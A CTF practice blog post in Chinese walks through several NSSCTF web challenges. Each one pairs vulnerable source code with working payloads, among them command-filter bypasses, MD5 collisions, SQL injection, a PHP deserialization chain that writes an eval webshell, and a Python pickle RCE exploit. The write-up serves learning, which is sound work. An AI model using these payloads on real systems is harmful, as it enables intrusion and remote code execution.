NSSCTF web 刷题记录2

已于 2023-10-21 11:47:26 修改
阅读量3.3k 收藏 2
点赞数 1
分类专栏: 刷题记录 文章标签: 前端 web安全 python php json
于 2023-09-17 23:37:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73512445/article/details/132864854
版权

文章目录

前言

今天是2023年9月13号,刷题记录2正式开始。时间来到九月十七号,因为病情导致休学;对于刚规划好的学习计划的我来说无疑是当头一棒,运气是差了点也不知道是不是被传染的,不过现在精神还不错,至少ctf的题目我还是沉得下心,所以借此转移我的注意力。

题目

[广东强网杯 2021 团队组]love_Pokemon

源代码

<?php
error_reporting(0);
highlight_file(__FILE__);
$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';

if(!file_exists($dir)){
    mkdir($dir);
}

function DefenderBonus($Pokemon){
    if(preg_match("/'| |_|\\$|;|l|s|flag|a|t|m|r|e|j|k|n|w|i|\\\\|p|h|u|v|\\+|\\^|\`|\~|\||\"|\<|\>|\=|{|}|\!|\&|\*|\?|\(|\)/i",$Pokemon)){
        die('catch broken Pokemon! mew-_-two');
    }
    else{
        return $Pokemon;
    }

}

function ghostpokemon($Pokemon){
    if(is_array($Pokemon)){
        foreach ($Pokemon as $key => $pks) {
            $Pokemon[$key] = DefenderBonus($pks);
        }
    }
    else{
        $Pokemon = DefenderBonus($Pokemon);
    }
}

switch($_POST['myfavorite'] ?? ""){
    case 'picacu!':
        echo md5('picacu!').md5($_SERVER['REMOTE_ADDR']);
        break;
    case 'bulbasaur!':
        echo md5('miaowa!').md5($_SERVER['REMOTE_ADDR']);
        $level = $_POST["levelup"] ?? "";
    if ((!preg_match('/lv100/i',$level)) && (preg_match('/lv100/i',escapeshellarg($level)))){
            echo file_get_contents('./hint.php');
        }
        break;
    case 'squirtle':
        echo md5('jienijieni!').md5($_SERVER['REMOTE_ADDR']);
        break;
    case 'mewtwo':
        $dream = $_POST["dream"] ?? "";
        if(strlen($dream)>=20){
            die("So Big Pokenmon!");
        }
        ghostpokemon($dream);
        echo shell_exec($dream);
}

?>

简单分析一下,首先是两个函数,功能分别为正则匹配一些字符;foreach循环检测每个值是否合法。然后就是swtich选择结构。

我们思路是可以先看看hint有什么,为了绕过if条件判断,我们可以用%81去绕过,因为%81为不可见字符,escapeshellcmd又可以将不可见字符消除
payload

myfavorite=bulbasaur!&levelup=lv%81100

在这里插入图片描述可以看到提示flag的位置以及文件名
回到源码,发现过滤了很多
我们可以用od命令和正则匹配去绕过检测,同时空格过滤替换

od 是一个在Unix和Linux系统上可用的命令行工具,用于以不同的格式显示文件的内容。它的名称代表"octal dump"(八进制转储),因为它最初的目的是以八进制形式显示文件的内容。

payload

myfavorite=mewtwo&dream=od%09/F[B-Z][@-Z]G

注:/F[B-Z][@-Z]G匹配/FLAG

在这里插入图片描述将这一串得到的八进制数字转换成字符串
脚本如下

dump = "0000000 051516 041523 043124 062173 062545 034463 063144 026467 0000020 034460 032060 032055 061070 026471 030470 030544 033455 0000040 030141 034066 034470 062067 032145 076467 000012 0000055"
octs = [("0o" + n) for n in  dump.split(" ") if n]
hexs = [int(n, 8) for n in octs]
result = ""
for n in hexs:
    if (len(hex(n)) > 4):
        swapped = hex(((n << 8) | (n >> 8)) & 0xFFFF)
        result += swapped[2:].zfill(4)
print(bytes.fromhex(result).decode())

得到flag
在这里插入图片描述

[NCTF 2018]Easy_Audit

源码

<?php
highlight_file(__FILE__);
error_reporting(0);
if($_REQUEST){
    foreach ($_REQUEST as $key => $value) {
        if(preg_match('/[a-zA-Z]/i', $value))   die('waf..');
    }
}

if($_SERVER){
    if(preg_match('/yulige|flag|nctf/i', $_SERVER['QUERY_STRING']))  die('waf..');
}

if(isset($_GET['yulige'])){
    if(!(substr($_GET['yulige'], 32) === md5($_GET['yulige']))){         //日爆md5!!!!!!
        die('waf..');
    }else{
        if(preg_match('/nctfisfun$/', $_GET['nctf']) && $_GET['nctf'] !== 'nctfisfun'){
            $getflag = file_get_contents($_GET['flag']);
        }
        if(isset($getflag) && $getflag === 'ccc_liubi'){
            include 'flag.php';
            echo $flag;
        }else die('waf..');
    }
}
?>

既然源码都给了,那我们一步步分析

首先是$_REQUEST有一个特性,当GET和POST有相同的变量时,匹配POST的变量,那么就可以同时传参GET和POST即可

然后就是$_SERVER['QUERY_STRING'],用于获取当前请求的查询字符串部分。查询字符串是位于 URL 中 ? 符号之后的部分,包含了以键值对形式传递的参数。所以我们可以url编码绕过即可

最后就是三个if语句,第一个我们数组绕过,因为传进去是个数组的时候,值就为空,自然就相等了;第二个preg_match只是结尾匹配字符串,那么我们直接传1nctfisfun绕过;第三个用php伪协议,传入值为data://text/plain,ccc_liubi

payload

GET:?%79%75%6C%69%67%65%5B[]=1&%6E%63%74%66=1%6E%63%74%66%69%73%66%75%6E&%66%6C%61%67=data://text/plain,ccc_liubi

POST:yulige=1&nctf=1&flag=1

注:将GET传参的三个变量名url编码一下
得到flag
在这里插入图片描述

[安洵杯 2019]easy_web

打开题目,发现有两个已经知道的参数

尝试传?cmd=php://filter/resource=flag.php发现没有反应

把穿的img的值放到cyberchef解码一下,发现经过base64–>base64–>Hex后,得到555.png

说明我们传的参数得为加密后的,我们尝试上传index.php去读取源码

php://filter/resource=index.php

经过Hex–>base64–>base64加密后,传参img(先试了参数cmd发现没反应)

但是没有显示源码

在这里插入图片描述

又试了试改为读取flag.php,还是不行

还是选择抓包看看读取index.php时返回了什么

在这里插入图片描述

我们不用伪协议,直接读取看看,index.php经过加密后上传

解密一下得到源码

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {  
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>

关键代码

if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

参数cmd匹配大小写,且过滤了很多

空格用%20代替

如果绕过检测,继续判断(string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])

这里的MD5得使用强绕过,不能使用数组绕过,因为这里使用了String强转换

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2

b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

(nss的不行,直接去buu做)

我们可以dir看一下目录

发现没有只好去看下根目录

我们可以用反斜杠绕过

如果 $cmd 的值为 “l\s”,那么在传递给 preg_match 函数之前,PHP 会首先将其转换为 “l\s”,其中第二个反斜杠是用来转义第一个反斜

杠的。由于正则表达式中没有直接匹配 “l\s” 这个字符串,所以它不会被正则表达式匹配,从而成功绕过了这个正则表达式的检测。

?cmd=l\s%20/

在这里插入图片描述

直接cat一下,得到flag

?cmd=ca\t%20/f\lag

在这里插入图片描述

[NCTF 2018]全球最大交友网站

打开题目,下载a.zip发现有.git文件
在这里插入图片描述那我们用GitHack扫一下
在这里插入图片描述打开发现有提示,提示我们真正的源码在tag == 1.0的commit

Allsource files areingit tag1.0

我们先git log命令查看历史版本
在这里插入图片描述

因为git版本更新啥的以前的flag文件可能就无了,而我们可以利用git reset命令查看git版本变化时每次提交的commit修改值查看修改的文件然后来回溯到对应版本,这里flag应该在最老的版本

git reset --hard 02b7f44320ac0ec69e954ab39f627b1e13d1d362

得到flag
在这里插入图片描述

prize_p2

源码

const { randomBytes } = require('crypto');
const express = require('express');
const fs = require('fs');
const fp = '/app/src/flag.txt';
const app = express();
const flag = Buffer(255);
const a = fs.open(fp, 'r', (err, fd) => {
    fs.read(fd, flag, 0, 44, 0, () => {
        fs.rm(fp, () => {});
		//这里删除了flag文件,但是文件打开了并没有关闭,并且这个js进程监听80端口也还在运行 
    });
});

app.get('/', function (req, res) {
    res.set('Content-Type', 'text/javascript;charset=utf-8');
    res.send(fs.readFileSync(__filename));
});

app.get('/hint', function (req, res) {
    res.send(flag.toString().slice(0, randomBytes(1)[0]%32));
})

// 随机数预测或者一天之后
app.get('/getflag', function (req, res) {
    res.set('Content-Type', 'text/javascript;charset=utf-8');
    try {
        let a = req.query.a;
        if (a === randomBytes(3).toString()) {
            res.send(fs.readFileSync(req.query.b));
        } else {
            const t = setTimeout(() => {
                res.send(fs.readFileSync(req.query.b));
            }, parseInt(req.query.c)?Math.max(86400*1000, parseInt(req.query.c)):86400*1000);
        }
    } catch {
        res.send('?');
    }
})

app.listen(80, '0.0.0.0', () => {
    console.log('Start listening')
});

我们先试试路径为/hint的GET请求
发现只能读一半
在这里插入图片描述
那么我们再看看路径为/getflag的GET请求
首先是使用Node.js的randomBytes函数生成一个长度为3的随机字节数组,将其转换为字符串,然后与变量"a"进行比较,如果不相等,执行setTimeout()回调函数。回调函数读取查询参数中名为"b"的文件,并将其内容作为响应发送回客户端。定时器的延迟时间由查询参数中的"c"决定,如果"c"是一个可解析为整数的值,则取该值与86400*1000(一天的毫秒数)之间的较大值作为延迟时间;否则,延迟时间为一天的毫秒数。

这里我们可以利用setTimeout()的漏洞,即setTimeout()的第二参数是用int类型来存储的,所以范围为1-2147483637,当不在这个范围时就会发生溢出,使用默认值1,相当于0延迟去绕过

这里由于我们是有这个正在运行的js文件发起的读文件请求,所以/proc/self目录就是这个js文件,所以PID可以用self代替,关键就在于fd的爆破了
payload

?c=2147483649&b=/proc/self/fd/18

得到flag

在这里插入图片描述

[羊城杯 2020]easyser

打开题目,没有什么发现
那么我们直接扫一下目录
在这里插入图片描述我们直接访问./robots.txt

在这里插入图片描述继续访问,发现来到有可以ssrf的界面,参数是path
在这里插入图片描述

我们查看下源码,发现有提示
在这里插入图片描述分析一下,不安全的协议应该就是http,因为它相对于https是不安全的;提示从我家,那么就是访问地址为127.0.0.1
payload

?path=http://127.0.0.1/ser.php

访问后发现暴露了源码
源码

<?php
error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
} 
$flag='{Trump_:"fake_news!"}';

class GWHT{
    public $hero;
    public function __construct(){
        $this->hero = new Yasuo;
    }
    public function __toString(){
        if (isset($this->hero)){
            return $this->hero->hasaki();
        }else{
            return "You don't look very happy";
        }
    }
}
class Yongen{ //flag.php
    public $file;
    public $text;
    public function __construct($file='',$text='') {
        $this -> file = $file;
        $this -> text = $text;
        
    }
    public function hasaki(){
        $d   = '<?php die("nononon");?>';
        $a= $d. $this->text;
         @file_put_contents($this-> file,$a);
    }
}
class Yasuo{
    public function hasaki(){
        return "I'm the best happy windy man";
    }
}

?> your hat is too black!

发现是反序列化,但是没有参数我们上传不了
这里用到一个工具arjun(可以爆破页面参数)
不过我这里2.2.1版本爆不出来
在这里插入图片描述以前的版本是可以爆出还有另外一个参数c

回到反序列化
pop链子

GWHT.__toString() --> Yongen.hasaki()

但是这里有个疑惑点,就是__toString()怎么调用呢
然后参考了其他师傅的wp,结合我们暴露源码时最下面的your hat is too black!
猜测是源码中反序列化点会直接输出对象,直接能触发该方法。

逻辑如下
$c=$_GET['c']; 
    if(isset($c)){
        echo $x = unserialize($c);  //echo 的时候会触发 __toString() 魔术方法
    }
    else{
        echo "your hat is too black!";
    }

然后我们开始构造exp,这里有个关键点就是如何绕过死亡代码<?php die("nononon");?>,因为它会拼接起来去执行。我们的方法是strip_tags绕过,因为死亡代码实际上是XML标签,既然是XML标签,我们就可以利用strip_tags函数去除它,而php://filter刚好是支持这个方法的。

但是我们要写入的一句话木马也是XML标签,在用到strip_tags时也会被去除。所以注意到在写入文件的时候,filter是支持多个过滤器的。可以先将webshell经过base64编码,strip_tags去除死亡exit之后,再通过base64-decode复原。
exp如下

<?php
class GWHT{
    public $hero;

}
class Yongen{ //flag.php
    public $file;
    public $text;
    
}
class Yasuo{
    
}

$a=new GWHT();
$b=new Yongen();
$a->hero=$b;
$a->hero->file='php://filter/string.strip_tags|convert.base64-decode/resource=shell.php';
$a->hero->text='PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==';  
//<?php @eval($_POST['shell']);?>经过base64编码
echo serialize($a);

?>

上传payload

?path=http://127.0.0.1/ser.php&c=O:4:"GWHT":1:{s:4:"hero";O:6:"Yongen":2:{s:4:"file";s:71:"php://filter/string.strip_tags|convert.base64-decode/resource=shell.php";s:4:"text";s:44:"PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==";}}

然后ls一下
在这里插入图片描述得到flag
在这里插入图片描述

[FBCTF 2019]rceservice

源码(网上搜的)

 <?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}
?>

打开题目,发现是要我们传参json格式的命令,并且过滤了很多东西

方法一

最开始想构造这个,发现cat用不了并且没有把preg_match绕过

?cmd={"cmd":"cat /flag"}

参考了其他师傅wp,发现原来是preg_match没有cat这个命令;然而Linux命令的位置:/bin,/usr/bin,默认都是全体用户使用,/sbin,/usr/sbin,默认root用户使用

故在payload中我们先在bin目录下找到要使用的cat,如下图
在这里插入图片描述同样我们可以在/home/rceservice找到flag
至于如何绕过preg_match,我们选择换行绕过
payload

?cmd={%0A"cmd":"/bin/cat /home/rceservice/flag"%0A}

得到flag
在这里插入图片描述

方法二

利用preg_match()函数的最大回溯机制次数限制

同理先用脚本找cat命令和flag的位置
脚本如下

import requests
url='http://node4.anna.nssctf.cn:28028/';
data={
    'cmd':'{"cmd":"/bin/cat /home/rceservice/flag","r1":"'+'a'*1000000+'"}'
}
r=requests.post(url=url,data=data).text
print(r)

得到flag
在这里插入图片描述

[WUSTCTF 2020]颜值成绩查询

打开题目,先随便测试一下,发现回显只有两个
经过测试,空格和union都被过滤了
我们先试试查询字段

-1/**/ununionion/**/select/**/1,2,3#

字段数为3
在这里插入图片描述

爆表名

-1/**/ununionion/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()#

在这里插入图片描述

爆列名

-1/**/ununionion/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'#

在这里插入图片描述

得到flag

-1/**/ununionion/**/select/**/1,2,group_concat(flag,value)/**/from/**/flag#

在这里插入图片描述

[西湖论剑 2022]Node Magical Login

这题比赛时是给了源码去分析,那我们直接分析源码
源码

const express = require("express")
const fs = require("fs")
const cookieParser = require("cookie-parser");
const controller = require("./controller")

const app = express();
const PORT = Number(process.env.PORT) || 80
const HOST = '0.0.0.0'


app.use(express.urlencoded({extended:false}))
app.use(cookieParser())
app.use(express.json())

app.use(express.static('static'))

app.post("/login",(req,res) => {
    controller.LoginController(req,res)
})


app.get("/",(res) => {
    res.sendFile(__dirname,"static/index.html")
})


app.get("/flag1",(req,res) => {
    controller.Flag1Controller(req,res)
})

app.get("/flag2",(req,res) => {
    controller.CheckInternalController(req,res)
})

app.post("/getflag2",(req,res)=> {
    controller.CheckController(req,res)
})

app.listen(PORT,HOST,() => {
    console.log(`Server is listening on Host ${HOST} Port ${PORT}.`)
})

简单分析一下,题目给了我们三个路由,看名字分析应该flag是分段的。具体的执行要看看controller里的函数
LoginController函数

function LoginController(req,res) {
    try {
        const username = req.body.username
        const password = req.body.password
        if (username !== "admin" || password !== Math.random().toString()) {
            res.status(401).type("text/html").send("Login Failed")
        } else {
            res.cookie("user",SECRET_COOKIE)
            res.redirect("/flag1")
        }
    } catch (__) {}
}

此函数作用是如果我们输入的用户和密码是正确的,那么就输出flag,但是这里的密码是随机数所以我们放弃这条路

再来看看./flag1对应的
Flag1Controller函数

function Flag1Controller(req,res){
    try {
        if(req.cookies.user === SECRET_COOKIE){
            res.setHeader("This_Is_The_Flag1",flag1.toString().trim())
            res.setHeader("This_Is_The_Flag2",flag2.toString().trim())
            res.status(200).type("text/html").send("Login success. Welcome,admin!")
        }
        if(req.cookies.user === "admin") {
            res.setHeader("This_Is_The_Flag1", flag1.toString().trim())
            res.status(200).type("text/html").send("You Got One Part Of Flag! Try To Get Another Part of Flag!")
        }else{
            res.status(401).type("text/html").send("Unauthorized")
        }
    }catch (__) {}
}

我们直接看到第二个if语句,只要cookie正确那么就可以获得第一部分的flag
我们试试上传user=admin,成功得到

在这里插入图片描述

继续看./flag2,但是这里好像没有我们想要的,直接略过
CheckInternalController函数

function CheckInternalController(req,res) {
    res.sendFile("check.html",{root:"static"})

}

最后看到./getflag2
CheckController函数

function CheckController(req,res) {
    let checkcode = req.body.checkcode?req.body.checkcode:1234;
    console.log(req.body)
    if(checkcode.length === 16){
        try{
            checkcode = checkcode.toLowerCase()
            if(checkcode !== "aGr5AtSp55dRacer"){
                res.status(403).json({"msg":"Invalid Checkcode1:" + checkcode})
            }
        }catch (__) {}
        res.status(200).type("text/html").json({"msg":"You Got Another Part Of Flag: " + flag2.toString().trim()})
    }else{
        res.status(403).type("text/html").json({"msg":"Invalid Checkcode2:" + checkcode})
    }
}

这里可以看到只要我们绕过if语句就可以得到第二部分flag。我们逐一分析if语句,第一个要求我们传参长度等于16,然后经过toLowerCase()将字符串小写;第二个要求checkcode得为aGr5AtSp55dRacer

这里我们利用数组绕过toLowerCase()函数,传入json数组格式
payload(记得把content-type改成json)

{"checkcode":["aGr5AtSp55dRacer","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"]}

得到flag第二部分

在这里插入图片描述

[HZNUCTF 2023 preliminary]pickle

打开题目,直接给了源码

import base64
import pickle
from flask import Flask, request
 
app = Flask(__name__)
 
 
@app.route('/')
def index():
    with open('app.py', 'r') as f:
        return f.read()
 
 
@app.route('/calc', methods=['GET'])
def getFlag():
    payload = request.args.get("payload")
    pickle.loads(base64.b64decode(payload).replace(b'os', b''))
    return "ganbadie!"
 
 
@app.route('/readFile', methods=['GET'])
def readFile():
    filename = request.args.get('filename').replace("flag", "????")
    with open(filename, 'r') as f:
        return f.read()
 
 
if __name__ == '__main__':
    app.run(host='0.0.0.0')

分析一下,给了两个路由

  1. /calc路由提供GET参数payload,然后pickle反序列化,并且过滤了关键字os,我们可以用拼接绕过
  2. /readFile路由提供GET参数filename,对其读取文件

exp(flag在环境变量中)

import pickle
import base64
 
class A():
    def __reduce__(self):
        return (eval,("__import__('o'+'s').system('env | tee a')",))
 
a = A()
b = pickle.dumps(a)
print(base64.b64encode(b))

在这里插入图片描述
然后读取得到flag
在这里插入图片描述

_rev1ve
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
NSSCTF刷题记录——[SWPUCTF 2021 新生赛]系列(WEB篇)
jameshuangchuan的博客
08-08 2836
此处主要在NSSCTF平台()上开展刷题
NSSCTF刷题记录——[SWPUCTF 2021 新生赛]系列(REVERSE篇)
jameshuangchuan的博客
08-10 2623
str.zfill(width)根据width长度对str进行切片,那么此题中的注释可以看出,result。真的麻,年轻时没有好好学习,后果就是一把年纪重新捡起这些玩意看到程序就头皮发麻……hex()用于将10进制整数转换成16进制,以字符串形式表示。ord()用来返回对应字符的ascii码。此处主要在NSSCTF平台(
WebCTFSHOW 常用姿势刷题记录(全)
最新发布
uuzeray的博客
02-25 1859
通过将常用的函数、类和数据打包成.so 文件,不同的程序可以共享这些代码,避免重复编写和维护相同的代码逻辑,提高了代码的重用性。
[安洵杯 2019]easy_web详解
weixin_61995249的博客
10-03 771
靶场:https://www.nssctf.cn/problem/732。
NSSCTF web 刷题记录1
rev1ve的博客
09-04 1858
今天是2023.9.3,大二开学前的最后一天。老实说ctf的功力还是不太够做的题目太少,新学期新气象。不可急于求成,稳扎稳打,把能利用的时间用来提升web实力。
CTF-file_get_contents()
mr__sheng的博客
09-11 349
calc.php?%20num=1;
ctfshow刷题-web3
m0_52011198的博客
02-22 161
php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。include里面的参数是url,提示了可以利用php://伪协议来进行代码执行。猜测ctf_go_go_go中含有flag,利用cat命令进行查看,得到flag。利用burp进行抓包,在包中写入想要执行对的代码,先使用ls命令查看一下文件。
NSSCTF刷题记录——[SWPUCTF 2021 新生赛]系列(CRYPTO篇)
jameshuangchuan的博客
08-28 1017
刚经过reverse的折磨又来?分析可得原文经过了三层加密,按顺序分别是base64、base32、base16,那倒序逐层解密就完事了。看着像是MD5加密过的。字符串复制粘贴到在线MD5解密工具上跑吧。第一次提交flag把牵前面的b'带上了,报错,去掉之后就对了。刚好前段时间刷到到过一篇文章讲猪圈密码的,直接对着看就行。碰到UUEncode解密的时候出现了flag。感觉没看出来啥规律,只好拿出工具无脑碰运气。此处主要在NSSCTF平台(……得到flag是md5yyds。
NSSCTF 2nd WEB
ytl_storm的博客
09-25 333
当我们上传test.php/.这样的文件时候,因为file_put_contents()第一个参数是文件路径,操作系统会认为你要在test1.php文件所在的目录中创建一个名为.的文件,最后上传的结果就为test.php。这里绕过的主要原理是Tornado模板在渲染时会执行__tt_utf8(__tt_tmp) 这样的函数,所以将__tt_utf8设置为eval,然后将__tt_tmp设置为了从POST方法中接收的字符串导致了RCE。为具体的某个算法,则密钥是不能为空的。猜测这里存在SSRF漏洞。
[BUUCTF]Pwn刷题记录
x0r
10-13 220
本部分内容长期更新,不再创建新文章影响阅读 rip 根据IDA加载入main函数声明发现s数组距离rbp的距离为F,即为15,这里的运行环境是64位,所以应当将Caller's rbp的数据填满,在这里是8位,即可构造payload from pwn import * p=remote("node4.buuoj.cn", 25401) #p=process("./pwn1") payload=b...
ctf-web bugku刷题(1)
农夫果园好好喝的博客
06-19 287
点开一看看得我头晕,这玩意是越蹦越快。 点开F12,flag就安静的躺在这里。 让我输入正确的答案,但是我只能输入一个数字,大概是需要修改源码。 修改为10. 点击验证,flag到手。(referer–来源伪造,x-forwarded–ip伪造,user-agent–用户浏览器,cookie–维持登录状态,用户身份识别)这个源码比较简单,就是说我们输入参数,就给flag。 使用hackbar给他参数赋值。 得到flag,就是不知道为什么有两个。和上一个题一样的界面,只不过换成了POST传参。 直
NSSCTF刷题笔记web14——[SWPUCTF 2021 新生赛]sql
qq_45692883的博客
01-26 331
粗劣试了一下,比较关键的是过滤了空格和等于。传的参数是wllm在源代码中有提示。第二步构造union语句查询数据库。使用mid函数对内容进行截取即可。然后我们再使用sqlmap跑跑看。空格我们可以用/**/代替。然后只露个头,我们截取一下。可以获取数据得到flag。第一步先确认字段数量。第五步,获取flag。
CTFshow刷题日记-WEB-爆破
Love&Share
09-03 3314
web21 提示:爆破什么的,都是基操 有一个zip文件,解压是一个爆破字典 Authorization: Basic dG9tY2F0OmFkbWlu ------->输入的用户名/口令以base64的形式传输。认证失败显示401 认证成功为200 将Authorization字段后面的值进行base64 解码,即可获取用户认证信息明文 使用bp的Intruder模块 payload type 选择custom iterator(自定义迭代器) 自定义迭代器可以自定义拼接方式,positio
CTFWeb方向练习题)(持续更新)
m0_56010012的博客
02-23 5157
1.Training-WWW-Robots 打开应用场景,如下: 网址后面添加/robots.txt 查看其中内容(robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件),内容如下: 根据提示,访问/fl0g.php,得到flag值。 ...
buuctf(探险3)
qq_62046696的博客
08-13 954
if(!strstr($get_flag," ")){ get传参进入的,里面没有空格、str_ireplace(子字符串忽略大小写替换)第二行,就是把get_flag中的cat 换成wctf20220,说白了就是过滤cat那我们先用ls查一下目录可是并没有什么回显,不知道我是哪错了看了大佬解释,说是传入的2e4不需要空格,这些都会自动加上出来了,但是我们查找目录 cat flag中间一定会有空格,的这里肯定是需要一种别的手段绕过一下。...
NSS [NCTF 2018]全球最大交友网站
热门推荐
Jay17的博客
11-10 6万+
NSS [NCTF 2018]全球最大交友网站
BUUCTF easy web中md5的问题
qq_44927883的博客
12-03 1498
看了大家的wp,在绕过下面的md5的时候,都是通过两个特殊的值绕过的,但经测后发现不对。 if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) { echo `$cmd`; } else { echo ("md5 is funny ~"); } 启动本地php跑一下 <?php echo (string)$_GET['a']; echo "
一天一道ctf 第25天(md5强碰撞)
scrawman的博客
04-17 1773
注意到URL中的img链接不寻常,对TXpVek5UTTFNbVUzTURabE5qYz0base64解码两次,Hex解码一次,得到555.png 那我们对index也同样Hex编码一次,base64编码两次得到TmprMlpUWTBOalUzT0RKbE56QTJPRGN3替换掉URL中原来的字符串 查看源代码里面一长串的字符串就是index.php,base64解码。而且在最后还有作者还写了一句MD5 is funny,可能也是提示 <?php error_reporting(E_ALL ||.
GJ-CTF web之 来一波_ 关于$_REQUEST变量
silence1_的博客
05-31 1802
GJ-CTF web之 来一波? 题目链接为:http://www.czlgjbbq.top/GJCTF/easyaduit.php 进入题目,题目直接给了源码提示 主要的内容为: if($_REQUEST){ foreach ($_REQUEST as $key => $value) { if(preg_match('/[a-zA-Z]/i', $value)) { ...
nssctf的jwt问3
08-17
首先将图像的背景填充为白色。 2. 在保存图片时,使用 `ImageIO.write()` 方法将二维码图像保存为 PNG 格式的图片文件。 3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_rev1ve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值